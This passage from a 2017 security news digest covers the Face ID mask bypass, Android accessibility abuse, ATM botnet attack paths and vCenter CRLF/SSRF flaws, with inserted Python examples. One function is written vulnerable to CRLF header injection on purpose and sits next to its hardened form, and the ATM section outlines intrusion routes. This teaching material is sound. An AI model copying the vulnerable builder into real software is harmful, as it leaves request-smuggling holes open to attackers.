CAST specifically analyzed code developed across ten different industry sectors within .NET and Java EE environments. It found a significantly different density of CWEs between the two environments, with .NET code generally having a greater density of weaknesses than Java EE -- in some cases with more than 35 CWE weaknesses per KLOC (1000 lines of code). A CWE is a coding weakness that could potentially be exploited by an attacker -- such as a buffer overflow flaw, or a SQLi or cross-site scripting flaw.

Financial services, Telecom and IT Consulting had the highest mean CWE densities. Energy and Utilities had the lowest CWE densities.

CAST also noted a difference between Waterfall coding and Agile coding -- with agile coding tending to introduce fewer weaknesses.

CAST's chief scientist, Bill Curtis, told SecurityWeek that while the Waterfall approach of defining and designing the entire project upfront is theoretically a good idea, business pressures -- with senior management requiring amendments in progress -- often make its actual implementation less than perfect. This in turn leads to additional work requirements and rushed deadlines introducing additional weaknesses.

In general, there are fewer CWE weaknesses found in Java EE developments that use an agile approach to development; that is, building the project while still in development, adding new features as required by senior management, and releasing new versions as soon as they are ready. This can be taken too far -- a high number of releases (more than 6 per year) tends to introduce a higher number of weaknesses. This could be indicative of business seeking new features and rapid releases above secure coding. Security needs to be built into the process rather than added on to the application.

Nevertheless, there is still a surprisingly high density of weaknesses found in all applications across all industry sectors. Curtis would personally recommend a hybrid approach: using a waterfall approach to get the architecture right from the beginning, but an agile approach to delivering code.

He sees the real problem as a lack of discipline in coding that is itself the result of a lack of adequately qualified programmers. The rush to digitizing all aspects of business has placed a severe strain on the available supply of programmers -- schools and colleges simply cannot produce new programmers as fast as necessary. Furthermore, the coders that are provided tend not to have any formal training in 'secure coding'.

The under-supply of programmers has led to the development of the off-shore programming industry -- and especially from India. CAST's analysis shows no real difference in the number of CWEs between on-shore and off-shore coding. However, Curtis told SecurityWeek that the continuing growth of demand has already absorbed the top layer of programmers from the off-shore industry, and less able programmers are beginning to be employed.

He does not, however, believe that the growth in demand will inevitably lead to increasing security weaknesses in the code. Companies will always need to select the best programmers they can find to employ, but now need to provide additional in-house training for secure coding. This approach coupled with automated static code analysis would improve the quality of new applications -- and help strengthen the security of existing applications.

In the meantime, he believes that school education needs to change. At the moment it concentrates on teaching youngsters reading, writing and arithmetic. He believes that basic coding should be given similar emphasis to reading and writing. In the future, schools may need to discuss elegant routines in the same way as they currently discuss Shakespearean metaphors.


ThreatQuotient Raises $30 Million in Series C Funding
14.11.2017 securityweek IT
Threat intelligence platform provider ThreatQuotient announced on Monday that it has raised $30 million in Series C funding, bringing the total amount raised by the company to $54 million to date.

Founded in 2013 by Wayne Chiang and Ryan Trost, who previously worked at a Security Operations Center of defense contractor General Dynamics, ThreatQuotient offers a threat intelligence platform that helps customers manage and correlate external sources with all internal analytics solutions for contextual, operationalized intelligence.

According to the Reston, Virginia-based company, the funding will be used to fuel product development and support sales and marketing efforts for global expansion.

The company’s ThreatQ platform allows security analysts to leverage a threat library, an adaptive workbench, and an open API exchange to provide threat intelligence that is timely, accurate and relevant to their business.

ThreatQuotient claims that its platform eliminates the need for a security analyst to go through an entire pool of data to identify a threat by automating the process and suggesting sources of data that are more relevant to a given client.

“Our industry is at a crossroads and organizations must shift beyond simple detection and response to a position of understanding and anticipating threats through intelligence-driven security,” said John Czupak, President and CEO of ThreatQuotient.

The Series C round was led by Adams Street Partners, while strategic partners Cisco Investments and NTT DOCOMO Ventures joined existing investor New Enterprise Associates (NEA), and growth capital partner Silicon Valley Bank in the financing.

Fred Wang, a partner of the Venture/Growth Team at Adams Street Partners, will join ThreatQuotient's board of directors.


iPhone X's Face ID Bypassed by a Mask
13.11.2017 securityweek Apple
Face ID, the facial biometric unlocking technology included in Apple's recently launched iPhone X, can be bypassed using a mask, security researchers have discovered.

When revealing the new iPhone X in early September, Apple said that Face ID would falsely match a random person only about 1 time in 1,000,000, day or night, and that professional mask makers and makeup artists in Hollywood had helped train the artificial intelligence behind the feature to resist bypass attempts.

The feature, however, raised concerns over the use of facial recognition becoming the norm and opening the door to new ways to abuse it. Some even feared that it would result in advertisers and law enforcement being able to track people’s whereabouts much easier.

At the same time, many questioned Face ID's effectiveness at keeping intruders out of the device. While some earlier attempts to trick the feature appear to have failed, Face ID was successfully bypassed by a mask created by Bkav, a Vietnamese company active in network security, software, smartphone manufacturing and smart-home products.

“One week after iPhone X officially went on sale, Bkav security experts from Vietnam show that Face ID can be fooled by a mask, which means it is not an effective security measure,” the company says.

The mask used in the experiment combined 3D-printed elements, a hand-sculpted nose and 2D-printed elements for some parts; hand-made skin was also applied to trick Apple's AI. The researchers put the total cost of the mask at $150.

“The mask is crafted by combining 3D printing with makeup and 2D images, besides some special processing on the cheeks and around the face, where there are large skin areas, to fool AI of Face ID,” Ngo Tuan Anh, Bkav's Vice President of Cyber Security, said.

The security researchers claim that the purpose of their experiment was to show that facial recognition isn’t mature enough to be used in widely available devices even after 10 years of development. In 2008, Bkav demonstrated that face recognition was not an effective security measure for laptops, after manufacturers started using the technology in their products.

Although they say a mask that beats Face ID is actually easy to create, the researchers admit that their understanding of how Apple's AI works, and of what it would take to bypass it, helped them build the proof of concept. They claim Apple relies too heavily on Face ID's AI for recognition, which allows the device to be unlocked even with half of the face covered.

“Potential targets shall not be regular users, but billionaires, leaders of major corporations, nation leaders and agents like FBI need to understand the Face ID's issue. Security units' competitors, commercial rivals of corporations, and even nations might benefit from our PoC,” Bkav says.

The researchers note that the mask was an experiment meant to prove a point, and that it was a successful experiment. They also revealed that they started working on the mask as soon as they received their iPhone X device on November 5 and that they plan on publishing full details related to how they built the mask.

“As for biometric security, fingerprint is the best,” the company concludes.

Until full details on the experiment are published, some questions remain unanswered, such as whether they used the dimensions of a real person’s face when creating the mask or if the attack was attempted with a fresh unlock.

Further details on how the experiment was set up are also required, such as whether the device was trained with the mask or not, and the number of attempts they used until successfully unlocking the phone.

SecurityWeek reached out to Apple for comment on Bkav's findings, but the company redirected us to its Knowledge Base article on Face ID, where the additional security measures are detailed. There, Apple explains that setting up Face ID requires a passcode, and that the passcode is requested after five unsuccessful attempts to match a face or if the device hasn't been unlocked for more than 48 hours.

The passcode is also requested if it “hasn’t been used to unlock the device in the last six and a half days and Face ID hasn't unlocked the device in the last 4 hours,” Apple says.
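The fallback rules Apple lists above decide how many tries a mask attacker actually gets before the phone demands the passcode. The following Python model is an added example, not Apple's code or Bkav's; the thresholds are the ones quoted in the text, while the assumptions that the failed-match counter resets only on a successful unlock and that a never-seen event counts as infinitely old are mine.

```python
from datetime import datetime, timedelta

# Thresholds quoted from Apple's Face ID support article in the text above.
MAX_FAILED_MATCHES = 5
UNLOCK_IDLE_LIMIT = timedelta(hours=48)
PASSCODE_IDLE_LIMIT = timedelta(days=6, hours=12)   # "six and a half days"
FACEID_IDLE_LIMIT = timedelta(hours=4)


def passcode_required(now, failed_matches, last_unlock, last_passcode_use, last_faceid_unlock):
    """Decide whether the device falls back to the passcode before accepting
    another face match. A timestamp of None means the event never happened and
    is treated as infinitely long ago (assumption, not stated by Apple)."""
    def age(ts):
        return timedelta.max if ts is None else now - ts

    if failed_matches >= MAX_FAILED_MATCHES:
        return True, "five unsuccessful face matches"
    if age(last_unlock) > UNLOCK_IDLE_LIMIT:
        return True, "not unlocked for more than 48 hours"
    if age(last_passcode_use) > PASSCODE_IDLE_LIMIT and age(last_faceid_unlock) > FACEID_IDLE_LIMIT:
        return True, "passcode unused for 6.5 days and Face ID idle for 4 hours"
    return False, "face match may be attempted"


def simulate_attempts(now, state, match_results):
    """Feed a sequence of match outcomes (True = sensor accepted the presented
    face) into the policy. The failed-match counter is assumed to reset only on
    a successful unlock (assumption). Returns (unlocked_by_faceid,
    passcode_prompted, attempts_consumed)."""
    failed = state.get("failed_matches", 0)
    for used, matched in enumerate(match_results, start=1):
        required, _ = passcode_required(now, failed, state.get("last_unlock"),
                                        state.get("last_passcode_use"),
                                        state.get("last_faceid_unlock"))
        if required:
            return False, True, used - 1
        if matched:
            return True, False, used
        failed += 1
    required, _ = passcode_required(now, failed, state.get("last_unlock"),
                                    state.get("last_passcode_use"),
                                    state.get("last_faceid_unlock"))
    return False, required, len(match_results)


def demo():
    """Constructed scenarios for a phone picked up on the morning of 13 Nov 2017."""
    now = datetime(2017, 11, 13, 9, 0)
    fresh = {"last_unlock": now - timedelta(hours=1),
             "last_passcode_use": now - timedelta(days=1),
             "last_faceid_unlock": now - timedelta(hours=1)}
    idle_two_days = dict(fresh, last_unlock=now - timedelta(hours=49))
    stale_passcode = {"last_unlock": now - timedelta(hours=5),
                      "last_passcode_use": now - timedelta(days=7),
                      "last_faceid_unlock": now - timedelta(hours=5)}
    return {
        "mask_five_misses": simulate_attempts(now, fresh, [False] * 5),
        "mask_third_try": simulate_attempts(now, fresh, [False, False, True]),
        "phone_idle_two_days": simulate_attempts(now, idle_two_days, [True]),
        "stale_passcode": simulate_attempts(now, stale_passcode, [True]),
    }
```

The practical reading for an attacker with a mask is the first scenario: a freshly used phone gives at most five presentations before the passcode is demanded, and a phone left untouched for two days gives none, so a mask only works against a device that its owner has been unlocking recently.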


Google to Ban Android Apps Misusing Accessibility Service
13.11.2017 securityweek Android
Following an increase in Android malware and adware that abuse accessibility services, Google has decided to take action against all apps that misuse the feature.

Much of the adware and malware that makes it onto the Google Play store abuses the BIND_ACCESSIBILITY_SERVICE permission. The permission is declared on an accessibility service so that only the system can bind to it, and it is designed to let apps assist users with disabilities; the user must still enable the service under Settings, which is why malicious apps typically social-engineer the victim into doing so. Once enabled, the service can read what is on screen and perform taps on the user's behalf, and malware developers have used that to click through prompts such as the device administrator dialog and conduct other malicious activities without raising suspicion.

One example is TOASTAMIGO, a piece of malware that exploits a recently patched vulnerability affecting the Toast feature in Android.

In an effort to prevent abuse, Google has decided that accessibility services should only be used to help people with disabilities. The tech giant has started contacting developers whose applications use the BIND_ACCESSIBILITY_SERVICE permission and informed them of the steps they need to take.

Developers who use the aforementioned permission to help people with disabilities must clearly state this in the app's description on Google Play, and they must describe the functionality provided by the Accessibility Service permission. All other developers will have to remove the permission from their products within 30 days or risk having the app pulled from the official app store.
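A reviewer or app-vetting pipeline can find the services Google's notice is about by reading the decoded manifest: an accessibility service is a `<service>` protected by BIND_ACCESSIBILITY_SERVICE with an intent filter for the AccessibilityService action. The Python below is an added example, not Google's tooling or code from any app named on this page; the manifest is constructed for the example, and the store-description keyword check is a crude triage heuristic of my own, not the policy Google enforces.

```python
import re
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
BIND_A11Y = "android.permission.BIND_ACCESSIBILITY_SERVICE"
A11Y_ACTION = "android.accessibilityservice.AccessibilityService"


def _a(elem, attr):
    """Read an android:-namespaced attribute from a decoded manifest element."""
    return elem.get("{%s}%s" % (ANDROID_NS, attr))


def accessibility_services(manifest_xml):
    """Fully qualified class names of services the system can bind as
    accessibility services: BIND_ACCESSIBILITY_SERVICE on the service plus the
    AccessibilityService action in an intent filter."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package", "")
    found = []
    for service in root.iter("service"):
        if _a(service, "permission") != BIND_A11Y:
            continue
        actions = {_a(action, "name") for action in service.iter("action")}
        if A11Y_ACTION not in actions:
            continue
        name = _a(service, "name") or ""
        if name.startswith("."):          # shorthand relative to the package
            name = package + name
        found.append(name)
    return sorted(found)


# Heuristic (assumption, not Google's rule): words a listing would use if the
# service genuinely exists to help users with disabilities.
DISCLOSURE_HINTS = re.compile(r"(accessib|disabilit|impair|screen reader|assistive)", re.IGNORECASE)


def needs_policy_review(manifest_xml, store_description):
    """True when the app ships an accessibility service but its listing never
    mentions an accessibility purpose; such apps are the ones Google told to
    justify the permission or drop it."""
    if not accessibility_services(manifest_xml):
        return False
    return DISCLOSURE_HINTS.search(store_description) is None


# Constructed sample: a "flashlight" app bundling an accessibility service.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.flashlight">
  <application android:label="Flashlight">
    <service android:name=".TorchService" android:exported="false"/>
    <service android:name=".OverlayService"
        android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
      <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService"/>
      </intent-filter>
      <meta-data android:name="android.accessibilityservice"
          android:resource="@xml/overlay_config"/>
    </service>
  </application>
</manifest>
"""
```

Run it against the output of a manifest decoder (apktool or aapt) rather than the binary AndroidManifest.xml inside the APK; the XML parser above expects the decoded text form.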

“Alternatively, you can choose to unpublish the app,” Google told developers. “All violations are tracked. Serious or repeated violations of any nature will result in the termination of your developer account, and investigation and possible termination of related Google accounts.”

Many users and developers have raised concerns regarding Google’s decision, pointing out that legitimate apps often use the Accessibility Service as a workaround for features that otherwise might be difficult or impossible to implement.

Popular applications such as the LastPass password manager are set to lose important functionality if Google moves forward with its decision. There is also a lot of concern regarding the automation app Tasker, which is not specifically designed for individuals with disabilities, but which appears to be of great aid to some people with Parkinson's disease and Asperger syndrome.

Some have offered advice on how app developers may be able to bypass the new restrictions, and shared thoughts on what alternative routes Google could take to prevent abuse while allowing legitimate apps to continue using the service.


Creating ATM Botnets Not Difficult, Researchers Say
13.11.2017 securityweek BotNet
ATMs Are Not Immune to Supply Chain Attacks and Other Digital Threats

Internet-connected automated teller machines (ATMs) can be discovered using dedicated search engines and specific keywords and then ensnared into botnets, Kaspersky Lab researchers believe.

With large sums of cash being loaded into ATMs on a daily basis, it’s no wonder that these devices are targeted by cybercriminals. And while some crooks take a blunt approach to getting into an ATM, using physical force, others prefer targeting the software running on the machine to make it spill out the cash, Kaspersky’s Olga Kochetova and Alexey Osipov explained at the DefCamp 2017 security conference in Bucharest last week.

There's no denying that ATMs run vulnerable software, they say. Many of the machines run the outdated, already retired Windows XP, meaning they are vulnerable by default, while others might have some unnecessary but flawed applications running on them, such as TeamViewer or an older, flawed variant of Adobe Acrobat Reader.

What's more, banks often do not keep their ATMs updated, which also makes them vulnerable to malware and other types of attacks, the researchers say. Security inside the ATM is usually poor, and the parts of the chain protecting the cash aren't secured separately, meaning that the entire chain can be compromised when a single part is exploited.

Accessing the software running on an ATM provides malicious actors with control over the cash cassettes inside the machine, thus allowing them to extract the cash. However, access to a single machine could also provide the actor with the ability to compromise the bank’s entire network of ATMs, Kaspersky’s researchers say.

There are multiple ways in which an attacker could achieve this, Kochetova and Osipov told SecurityWeek during a private talk at the DefCamp conference: by physically accessing an ATM to install a device in it, by compromising the computers that oversee the bank’s ATMs, and even by a supply-chain attack that focuses on the firmware that vendors or maintenance teams install on the machines.

“With access to an ATM, an actor could install a device in one ATM to send commands to all machines in the network. These commands would look like they come from the central command center. The actor can then use blank cards, or any cards, and withdraw cash from any ATM in the network,” the researchers explained.

This is possible because all of a bank's ATMs are typically connected to a flat network, which means that every machine in the network can see every other connected machine. Thus, if the attacker's device is implanted in an ATM and connected directly to the network cable, it could allow an attacker to remotely control the machines. It is a classic man-in-the-middle (MitM) attack, the researchers say.

They also pointed out that all evidence would disappear once the malicious device has been extracted from the ATM. Although a possibility, no such botnet has been observed to date. What has been seen, however, was a bank’s network being infected with an information stealer.

“This can be seen as a kind of an ATM botnet, since all machines were infected and the actor was remotely collecting data from them,” Kochetova said. “It is also possible that some crooks somewhere in the world are preparing an attack with money-withdrawal malware instead of sniffers,” she continued.

Attackers could also take the VPN device out of the ATM and use it to connect to the bank's network without anyone noticing, Osipov explained. Such VPN devices are designed to work independently of the host machine, so an attacker could plug one into their own computer.

One other effective method of infiltrating ATM networks is to discover the machines that are online using specialized search engines such as Shodan, the researchers say. Although banks usually claim that no ATM is online, these devices can be easily found if the right keywords or phrases are used to perform the search, Kochetova and Osipov explained.

While the attack vector has been used before (specialized search engines can be used to discover vulnerable Internet of Things (IoT) devices, unsecured databases, and other types of Internet-facing devices), it is relatively new when it comes to finding ATMs.

Once they have discovered the online ATMs, the malicious actor can start checking for open ports and then attempt to compromise machines using known exploits. Thus, attackers could install information-stealing malware on the ATMs or ensnare them into botnets.

Infecting workstations inside the bank and then expanding the footprint to the entire network, including ATMs, is another compromise technique that attackers (such as the Cobalt hacking group) are using.

Recent attacks such as CCleaner and NotPetya have demonstrated the impact supply-chain attacks can have on a global scale, and Kaspersky's researchers say that ATMs aren't safe from this type of attack either. To be successful, the attacker would target the "golden image" used to install the operating system and all running software on an ATM.

“We already observed incidents where ordinary malware ended up on an ATM through an infected USB drive that a technician connected to the machine. Thus, if an infected ‘golden image’ is used, the technician would never even notice the compromise. Of course, the attacker would have to know what specific software to install on that ‘golden image’ to compromise the ATMs without being noticed,” Osipov said.

“The same would happen if a service provider is used as a vector of attack. No one would notice the compromise,” he also said.
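The defence a practitioner would want against the golden-image scenario is an integrity check performed before deployment with a key the technician does not carry: an image whose files no longer match a manifest signed by the bank is refused, and so is a manifest the attacker re-signed without the key. The Python below is an added example of that check, not Kaspersky's code or any vendor's tooling; the file names, the two-file "image" and the signing key are constructed for the example, and in practice the key would be held by the bank (ideally in an HSM), not on the technician's media.

```python
import hashlib
import hmac
import json
import os
import tempfile


def hash_file(path, chunk_size=1 << 16):
    """SHA-256 of a file, streamed so large OS images do not load into memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(image_root):
    """Map every file under image_root (relative POSIX path) to its SHA-256."""
    manifest = {}
    for dirpath, _, filenames in os.walk(image_root):
        for filename in filenames:
            full = os.path.join(dirpath, filename)
            rel = os.path.relpath(full, image_root).replace(os.sep, "/")
            manifest[rel] = hash_file(full)
    return manifest


def sign_manifest(manifest, key):
    """HMAC-SHA256 over the canonical JSON form of the manifest. Whoever holds
    the key can re-sign a tampered image, so it must not travel with the image."""
    canonical = json.dumps(manifest, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def verify_image(image_root, manifest, signature, key):
    """Sorted findings; an empty list means the tree matches the signed manifest."""
    if not hmac.compare_digest(sign_manifest(manifest, key), signature):
        return ["manifest signature invalid: do not trust its contents"]
    actual = build_manifest(image_root)
    findings = []
    for rel, digest in manifest.items():
        if rel not in actual:
            findings.append("missing: " + rel)
        elif actual[rel] != digest:
            findings.append("modified: " + rel)
    findings.extend("unexpected: " + rel for rel in actual if rel not in manifest)
    return sorted(findings)


def demo():
    """Constructed scenario: a tiny 'image', then a tampered copy of it."""
    key = b"bank-held-signing-key"  # placeholder for a key the technician never sees
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "bin"))
        with open(os.path.join(root, "bin", "xfs_agent.exe"), "wb") as f:
            f.write(b"vendor agent build 1")
        with open(os.path.join(root, "config.ini"), "wb") as f:
            f.write(b"host=atm-mgmt.bank.example\n")
        manifest = build_manifest(root)
        signature = sign_manifest(manifest, key)
        clean = verify_image(root, manifest, signature, key)

        # Supply-chain tampering: patch the agent binary and add a dropper.
        with open(os.path.join(root, "bin", "xfs_agent.exe"), "ab") as f:
            f.write(b"\x90\x90")
        with open(os.path.join(root, "bin", "dropper.dll"), "wb") as f:
            f.write(b"MZ")
        tampered = verify_image(root, manifest, signature, key)

        # The attacker ships a fresh manifest for the tampered tree but lacks the key.
        forged_manifest = build_manifest(root)
        forged_sig = sign_manifest(forged_manifest, b"attacker-guess")
        forged = verify_image(root, forged_manifest, forged_sig, key)
    return clean, tampered, forged
```

The same check applied on the ATM itself at boot, against a manifest stored outside the technician's USB media, also catches the infected-USB case Osipov describes, since the malware shows up as an unexpected or modified file.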

An ATM botnet could also be used to mine crypto-currency. Crypto miners have become highly popular over the past few years, and an increasing number of malicious campaigns focused on deploying such software were observed this year. Because they have computing power, ATMs can be used for mining too.

“In the end, every ATM is yet another type of computer. This means it can be hacked if the right vulnerabilities are discovered,” Kochetova pointed out. “It is the same as with CCTV cameras that are infected to create IoT botnets,” she concluded.


VMware Patches Vulnerabilities in vCenter Server
13.11.2017 securityweek Vulnerebility
The VMware vCenter Server management software is affected by two moderate-severity vulnerabilities that can be exploited for information disclosure and remote denial-of-service (DoS) attacks.

The first flaw, tracked as CVE-2017-4927, is related to how vCenter Server handles specially crafted LDAP network packets. An attacker can exploit the vulnerability remotely to cause a DoS condition.

The vulnerability was discovered by a Fortinet researcher in January, but it was only confirmed in April and patched some months later. Fortinet has published its own advisory for the security hole and assigned it a risk rating of 3/5.

The issue affects vCenter Server 6.0 and 6.5 on any platform and it has been addressed with the release of versions 6.0 U3c and 6.5 U1.

The second vulnerability, CVE-2017-4928, affects the Flash-based vSphere Web Client; VMware pointed out that the HTML5-based application is not affected.

This CVE identifier has actually been assigned to two weaknesses discovered by a Tencent researcher in the product: a server-side request forgery (SSRF) issue and a CRLF injection bug.

“An attacker may exploit these issues by sending a POST request with modified headers towards internal services leading to information disclosure,” VMware said in its advisory.
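The two weaknesses VMware names, CRLF injection and server-side request forgery, are a general pattern: a component builds a request to an internal service from caller-controlled input, so a header value carrying a line break splits into an extra header and the target host is never checked against internal address space. The Python below is an added example of the bug class beside its hardened form; it is not vCenter's code and does not reproduce the Tencent researcher's findings, and the host names, paths and the injected resolver are constructed so the example runs offline.

```python
import ipaddress
import re
from urllib.parse import urlsplit

HEADER_NAME = re.compile(r"[A-Za-z0-9-]+")


def build_request_vulnerable(host, path, extra_headers):
    """Naive builder: caller-controlled header values are copied verbatim, so a
    value containing "\\r\\n" injects a new header line (CRLF injection)."""
    lines = ["POST %s HTTP/1.1" % path, "Host: %s" % host]
    for name, value in extra_headers.items():
        lines.append("%s: %s" % (name, value))
    return "\r\n".join(lines) + "\r\n\r\n"


def header_lines(raw_request):
    """Header block of a raw request, one element per line as a peer parses it."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    return head.split("\r\n")


def clean_header_value(value):
    """Reject CR, LF and NUL rather than silently stripping them, so an attempt
    fails loudly and can be logged."""
    if any(ch in value for ch in "\r\n\0"):
        raise ValueError("control characters in header value")
    return value.strip()


def build_request_hardened(host, path, extra_headers):
    """Same builder with header names restricted to token characters and every
    value passed through clean_header_value()."""
    if re.search(r"\s", path):
        raise ValueError("whitespace in request path")
    lines = ["POST %s HTTP/1.1" % path, "Host: %s" % clean_header_value(host)]
    for name, value in extra_headers.items():
        if not HEADER_NAME.fullmatch(name):
            raise ValueError("bad header name %r" % name)
        lines.append("%s: %s" % (name, clean_header_value(value)))
    return "\r\n".join(lines) + "\r\n\r\n"


def is_internal_target(url, resolve=None):
    """SSRF guard: True when the URL's host is loopback, link-local, private or
    reserved address space. `resolve` maps a hostname to an IP string and is
    injected so the check runs offline here; without a resolver an unresolved
    hostname is treated as internal (fail closed)."""
    host = urlsplit(url).hostname
    if host is None:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        if resolve is None:
            return True
        ip = ipaddress.ip_address(resolve(host))
    return ip.is_loopback or ip.is_link_local or ip.is_private or ip.is_reserved
```

Two caveats apply to the SSRF guard in real deployments: the address must be checked on the connection actually made (resolve once and connect to that IP, or the host can flip between checks by DNS rebinding), and HTTP redirects returned by the first hop must be re-validated with the same rule.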

vCenter Server 5.5 and 6.0 are affected, and patches are included in versions 5.5 U3f and 6.0 U3c.

VMware’s disclosure of the vulnerabilities coincides with the release of vCenter Server 6.0 U3c. The other versions that include patches for these security holes, 5.5 U3f and 6.5 U1, were made available in mid-September and late July, respectively.

Version 6.5 U1 also patched a moderate severity stored cross-site scripting (XSS) vulnerability in the vCenter Server H5 Client. The flaw can be exploited by an authenticated attacker to execute malicious JavaScript code in the targeted user’s context.

vCenter Server versions 5.5, 6.0 and 6.5 are also affected by a bug that allows an attacker with limited user privileges to abuse an API in order to access the guest operating system without authentication. The flaw was disclosed in late July at the Black Hat security conference in Las Vegas, but VMware has only released workarounds for it.


Bug bounty programs and a vulnerability disclosure policy allowed the Pentagon to fix thousands of flaws
13.11.2017 securityaffairs BigBrothers

Bug bounty programs allowed the US agency to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.
The ‘Hack the Pentagon’ bug bounty program launched in 2016, together with the vulnerability disclosure policy announced nearly a year ago, allowed the Department of Defense to receive 2,837 valid bug reports from 650 white hat hackers located in 50 countries around the world.

“Great news for U.S. citizens! Over 3,000 valid security vulnerabilities have been resolved with the U.S. Department of Defense’s “Hack the Pentagon” hacker-powered security program.” reported the platform used by the US Government to manage the initiatives.

“Just over a year ago, following the success of the pilot, we announced the U.S. Department of Defense was expanding its “Hack the Pentagon,” initiatives. To date, HackerOne and DoD have run bug bounty challenges for Hack the Pentagon, Hack the Army and Hack the Air Force.

The success of the bug bounty programs launched by the US Government has been undeniable.

The hackers have earned over $300,000 in bounties for their contributions. They reported nearly 500 vulnerabilities in nearly 40 DoD components, and more than 100 of the flaws have been rated critical or high severity.

Let me also remind you that the DoD vulnerability disclosure program does not offer any monetary rewards, instead it allows hackers to report security holes without the fear of potential legal consequences.

The list of vulnerabilities includes remote code execution, SQL injection, and authentication bypass issues.

Bug bounty Hack the Pentagon

The majority of the reports were submitted by US researchers, followed by white hat hackers in India, the U.K., Pakistan, Philippines, Egypt, Russia, France, Australia and Canada.

Going through the various bug bounty initiatives launched by the US Government: Hack the Pentagon received 138 valid submissions and paid out roughly $75,000, Hack the Army paid out approximately $100,000 for 118 valid reports, and Hack the Air Force paid out $130,000 for 207 valid reports.

Following the success of “Hack the Pentagon,” several bug bounty programs were announced by U.S. authorities.